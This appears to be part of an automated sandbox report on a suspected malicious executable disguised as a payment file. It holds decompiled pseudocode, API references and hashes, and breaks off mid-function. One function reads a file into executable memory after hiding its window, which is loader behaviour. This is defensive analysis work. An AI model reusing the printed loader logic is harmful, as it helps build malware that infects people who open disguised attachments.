0x004023ba
0x004023ba
0x004023bd
0x00402493
0x00402493
0x004028a4
0x004028b0

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024ce
0x00401561
0x00402849
0x004028a4
0x004028b0

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 00403A17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
						_t11 =  *0x423fac;
						_t27 =  *0x423fa8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403a1b
0x00403a20
0x00403a26
0x00403a2b
0x00403a2b
0x00403a33
0x00000000
0x00000000
0x00403a3b
0x00403a43
0x00403a45
0x00403a4b
0x00403a4b
0x00403a4d
0x00403a59
0x00000000
0x00000000
0x00403a5d
0x00000000
0x00000000
0x00000000
0x00403a5f
0x00403a64
0x00403a6d
0x00403a73
0x00403a78
0x00403a8c
0x00403a97
0x00403aaf
0x00403ab5
0x00403aba
0x00403ac2
0x00403ae3
0x00403ae3
0x00403ae3
0x00403ac4
0x00403ac6
0x00403ac6
0x00403aca
0x00403ad1
0x00403ad1
0x00403ad6
0x00403adc
0x00403adc
0x00000000
0x00403ac6
0x00403a7a
0x00403a7f
0x00403a88
0x00403a81
0x00403a81
0x00403a81
0x00403a7f

APIs

SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF

Strings

1033, xrefs: 00403A1B, 00403A25, 00403A96
"C:\Users\user\Desktop\Payment_copy28476450.exe", xrefs: 00403A18

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Payment_copy28476450.exe"$1033
API String ID: 530164218-2687726307
Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}

0x00404f43
0x00404f68
0x00404f88
0x00404f8b
0x00404f8e
0x00404fa5
0x00404fab
0x00404fb2
0x00404fb9
0x00404fc0
0x00404fc5
0x00404fcb
0x00000000
0x00404fdb
0x00404f75
0x00404fc8
0x00404fc8
0x00000000
0x00404fc8
0x00404f81
0x00404f83
0x00000000
0x00404f83
0x00404f49
0x00000000
0x00000000
0x00404f50
0x00000000

APIs

IsWindowVisible.USER32 ref: 00404F6D
CallWindowProcA.USER32 ref: 00404FDB

Part of subcall function 00404003: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404015

Strings

, xrefs: 00404F45

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD

Uniqueness

Uniqueness Score: -1.00%

Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}

0x004036ba
0x004036c2
0x004036c9
0x004036cc
0x004036cc
0x004036ce
0x004036d3
0x004036da
0x004036e0
0x004036e4
0x004036e5
0x004036ed

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,746AF560,00403690,00000000,00403482,00000000), ref: 004036D3
GlobalFree.KERNEL32 ref: 004036DA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405836
0x00405840
0x00405842
0x00405849
0x00405851
0x00000000
0x00000000
0x00000000
0x00405851
0x00405853
0x00405858

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_copy28476450.exe,C:\Users\user\Desktop\Payment_copy28476450.exe,80000000,00000003), ref: 0040583B
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_copy28476450.exe,C:\Users\user\Desktop\Payment_copy28476450.exe,80000000,00000003), ref: 00405849

Strings

C:\Users\user\Desktop, xrefs: 00405835

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3125694417
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x00405953
0x00405955
0x0040597d
0x00405962
0x00405967
0x00405972
0x00000000
0x0040598f
0x0040597b
0x0040597b
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wcycejenv.exePID: 588, Parent PID: 160COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	234
Total number of Limit Nodes:	1

Executed Functions

Function 004064B0 Relevance: 146.4, APIs: 43, Strings: 40, Instructions: 1194
filememoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E004064B0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a8, signed short _a12245929) {
				int _v8;
				void* _v12;
				signed int _v16;
				WCHAR* _v20;
				void* _v24;
				int _v28;
				void* _v32;
				WCHAR* _v36;
				int _v40;
				char _v44;
				signed short* _v48;
				long _v52;
				long _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				signed int _v68;
				int _v72;
				int _v76;
				signed int _v80;
				int _v84;
				int _v88;
				intOrPtr _v92;
				long _v96;
				long _v100;
				void* _v104;
				long _v108;
				long _v112;
				long _v116;
				signed char* _v120;
				long _v124;
				signed char* _v128;
				long _v132;
				signed char* _v136;
				long _v140;
				signed char* _v144;
				long _v148;
				signed char* _v152;
				long _v156;
				signed char* _v160;
				long _v164;
				signed char* _v168;
				long _v172;
				signed char* _v176;
				long _v180;
				signed char* _v184;
				long _v188;
				signed char* _v192;
				long _v196;
				short _v204;
				int _v208;
				long _v212;
				char _v220;
				char _v228;
				struct _STARTUPINFOW _v296;
				char _v348;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				char _v632;
				short _v1152;
				short _v3200;
				short _v19584;
				struct HWND__* _t389;
				int _t391;
				void* _t395;
				void* _t397;
				long _t441;
				long _t443;
				void* _t445;
				void* _t452;
				signed char* _t457;
				long _t462;
				char _t507;
				long _t531;
				long _t537;
				long _t545;
				signed char* _t556;
				signed char* _t562;
				intOrPtr _t570;
				signed char* _t574;
				WCHAR* _t591;
				void* _t603;
				int _t604;
				int _t606;
				void* _t608;
				signed short _t612;
				signed char* _t670;
				int _t672;
				signed char* _t676;
				signed int _t678;
				signed char* _t702;
				signed char* _t706;
				signed char* _t711;
				signed char* _t713;
				signed char* _t717;
				signed char* _t727;
				signed char* _t801;
				signed char* _t828;
				signed char* _t832;
				signed char* _t836;
				signed char* _t840;
				signed char* _t860;
				signed char* _t862;
				void* _t892;
				void* _t893;
				void* _t894;
				void* _t895;
				void* _t896;
				void* _t900;

				_t889 = __edi;
				_t389 = E00407800(0x4c7c);
				_v48 = 0;
				_v24 = 0;
				_v116 = 1;
				_v68 = 0;
				_v28 = 0;
				_v208 = 0;
				_v8 = 0;
				_v76 = 0;
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t389, 0); // executed
				_push(0x3d0900); // executed
				_t391 = E00413B7B(); // executed
				_t894 = _t893 + 4;
				_v76 = _t391;
				if(_v76 == 0) {
					return 0;
				}
				E004097A0(__edi, _v76, 0x54, 0x3d0900);
				_t895 = _t894 + 0xc;
				_t395 = CreateFileW( *(_a8 + (4 << 0)), 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v104 = _t395;
				_v96 = GetFileSize(_v104, 0);
				_t397 = VirtualAlloc(0, _v96, 0x3000, 0x40); // executed
				_v12 = _t397;
				ReadFile(_v104, _v12, _v96,  &_v212, 0); // executed
				goto L3;
				do {
					L8:
					_t670 =  *0x4494a8; // 0x4533bc
					if(( *_t670 & 8) != 0) {
						_t457 =  *0x4494a8; // 0x4533bc
						_v120 = _t457;
						_v124 = 3;
						E00406000(_v124, _v120, "wmain", "Full commandline \'%s\'\n", E00406150(_v48));
						_t900 = _t900 + 0x14;
					}
				} while (0 != 0);
				L16:
				while(( *_v16 & 0x0000ffff) != 0) {
					if(( *_v16 & 0x0000ffff) == 0x2f) {
						_t612 = E004135D1( *(_v16 + (2 << 0)) & 0x0000ffff);
						_t900 = _t900 + 4;
						_v80 = _t612 & 0x0000ffff;
						_v80 = _v80 - 0x61;
						if(_v80 > 0x15) {
							L32:
							if( *0x454c2c != 0 ||  *0x454c30 != 0) {
								_v16 = _v16 + 4;
								L36:
								while(( *_v16 & 0x0000ffff) != 0) {
									_t608 = E004088E2(L" \t,=;",  *_v16 & 0x0000ffff);
									_t900 = _t900 + 8;
									if(_t608 == 0) {
										break;
									}
									_v16 = _v16 + 2;
								}
								if(_v100 != 0) {
									0x400000(L"OFF");
								}
								 *0x456ef0 = 0;
								SetEnvironmentVariableW(L"PROMPT", L"$P$G");
								if( *0x454c2c != 0 ||  *0x454c30 != 0) {
									_v84 = 0;
									_v88 = 0;
									_v24 = E00405D10(_v16);
									if( *0x454c34 == 0) {
										_t606 = E004088E2(_v16, 0x22);
										_t900 = _t900 + 8;
										_v84 = _t606;
										if(_v84 == 0) {
											 *0x454c34 = 1;
										}
									}
									if( *0x454c34 == 0) {
										_t604 = E004088E2(_v84 + 2, 0x22);
										_t900 = _t900 + 8;
										_v88 = _t604;
										if(_v88 == 0) {
											 *0x454c34 = 1;
										}
									}
									if( *0x454c34 == 0) {
										_t603 = E004088E2(_v88 + 2, 0x22);
										_t900 = _t900 + 8;
										if(_t603 != 0) {
											 *0x454c34 = 1;
										}
									}
									if( *0x454c34 != 0) {
										L68:
										_t801 =  *0x4494a8; // 0x4533bc
										if(( *_t801 & 8) != 0) {
											_t676 =  *0x4494a8; // 0x4533bc
											_v128 = _t676;
											_v132 = 3;
											E00406000(_v132, _v128, "wmain", "/c command line: \'%s\'\n", E00406150(_v24));
											_t900 = _t900 + 0x14;
										}
									} else {
										 *0x454c34 = 1;
										_v20 = _v84;
										while(_v20 != _v88) {
											if(( *_v20 & 0x0000ffff) == 0x26 || ( *_v20 & 0x0000ffff) == 0x3c || ( *_v20 & 0x0000ffff) == 0x3e || ( *_v20 & 0x0000ffff) == 0x28 || ( *_v20 & 0x0000ffff) == 0x29 || ( *_v20 & 0x0000ffff) == 0x40 || ( *_v20 & 0x0000ffff) == 0x5e || ( *_v20 & 0x0000ffff) == 0x7c) {
												 *0x454c34 = 1;
												do {
													goto L68;
												} while (0 != 0);
												if( *0x454c34 != 0) {
													L124:
													if( *0x454c34 != 0 && ( *_v24 & 0x0000ffff) == 0x22) {
														E004056C0(_v24);
													}
													goto L127;
												}
												_t531 = _v24;
												0x400000(_t531, 0, 0, 0, 1);
												_v60 = _t531;
												_v52 = 0;
												0x400000( &_v19584);
												_v108 = GetEnvironmentVariableW(L"PATHEXT",  &_v19584, _t531);
												if(_v108 == 0) {
													L74:
													lstrcpyW( &_v19584, L".bat;.com;.cmd;.exe");
													do {
														L75:
														_t832 =  *0x4494a8; // 0x4533bc
														if(( *_t832 & 8) != 0) {
															_t702 =  *0x4494a8; // 0x4533bc
															_v136 = _t702;
															_v140 = 3;
															E00406000(_v140, _v136, "wmain", "First parameter is \'%s\'\n", E00406150(_v60));
															_t900 = _t900 + 0x14;
														}
													} while (0 != 0);
													_t537 = E004088E2(_v60, 0x5c);
													_t900 = _t900 + 8;
													if(_t537 == 0) {
														0x400000(0);
														if(SearchPathW(0, _v60, 0, _t537,  &_v3200,  &_v3200) == 0) {
															_v64 =  &_v19584;
															while(_v52 == 0 && _v64 != 0) {
																_t545 = E004088E2(_v64, 0x3b);
																_t900 = _t900 + 8;
																_v56 = _t545;
																if(_v56 == 0) {
																	_v56 = 0;
																} else {
																	 *_v56 = 0;
																	_t545 = _v56 + 2;
																	_v56 = _t545;
																}
																0x400000(0);
																if(SearchPathW(0, _v60, _v64, _t545,  &_v3200,  &_v3200) == 0) {
																	L118:
																	_v64 = _v56;
																	continue;
																} else {
																	do {
																		_t840 =  *0x4494a8; // 0x4533bc
																		if(( *_t840 & 8) != 0) {
																			_t711 =  *0x4494a8; // 0x4533bc
																			_v176 = _t711;
																			_v180 = 3;
																			_push(E00406150(_v64));
																			E00406000(_v180, _v176, "wmain", "Found on path as \'%s\' with extension \'%s\'\n", E00406150( &_v3200));
																			_t900 = _t900 + 0x18;
																		}
																	} while (0 != 0);
																	_v52 = 1;
																	goto L118;
																}
															}
															L119:
															if(_v52 != 0) {
																goto L124;
															} else {
																goto L120;
															}
															do {
																L120:
																_t836 =  *0x4494a8; // 0x4533bc
																if(( *_t836 & 8) != 0) {
																	_t706 =  *0x4494a8; // 0x4533bc
																	_v184 = _t706;
																	_v188 = 3;
																	_push("Binary not found, dropping back to old behaviour\n");
																	_push("wmain");
																	_push(_v184);
																	_push(_v188);
																	E00406000();
																	_t900 = _t900 + 0x10;
																}
															} while (0 != 0);
															 *0x454c34 = 1;
															goto L124;
														} else {
															goto L103;
														}
														do {
															L103:
															_t713 =  *0x4494a8; // 0x4533bc
															if(( *_t713 & 8) != 0) {
																_t556 =  *0x4494a8; // 0x4533bc
																_v168 = _t556;
																_v172 = 3;
																E00406000(_v172, _v168, "wmain", "Found on path as \'%s\'\n", E00406150( &_v3200));
																_t900 = _t900 + 0x14;
															}
														} while (0 != 0);
														_v52 = 1;
														goto L119;
													}
													0x400000(0);
													if(E00403F90( &_v3200, _v60, _t537,  &_v3200,  &_v3200) != 0) {
														do {
															_t717 =  *0x4494a8; // 0x4533bc
															if(( *_t717 & 8) != 0) {
																_t562 =  *0x4494a8; // 0x4533bc
																_v144 = _t562;
																_v148 = 3;
																E00406000(_v148, _v144, "wmain", "Full path name \'%s\'\n", E00406150( &_v3200));
																_t900 = _t900 + 0x14;
															}
														} while (0 != 0);
														_v20 = _t892 + lstrlenW( &_v3200) * 2 - 0xc7c;
														if(GetFileAttributesW( &_v3200) == 0xffffffff) {
															_v36 =  &_v19584;
															while(_v52 == 0 && _v36 != 0) {
																_t570 = E004088E2(_v36, 0x3b);
																_t900 = _t900 + 8;
																_v92 = _t570;
																if(_v92 == 0) {
																	lstrcpyW(_v20, _v36);
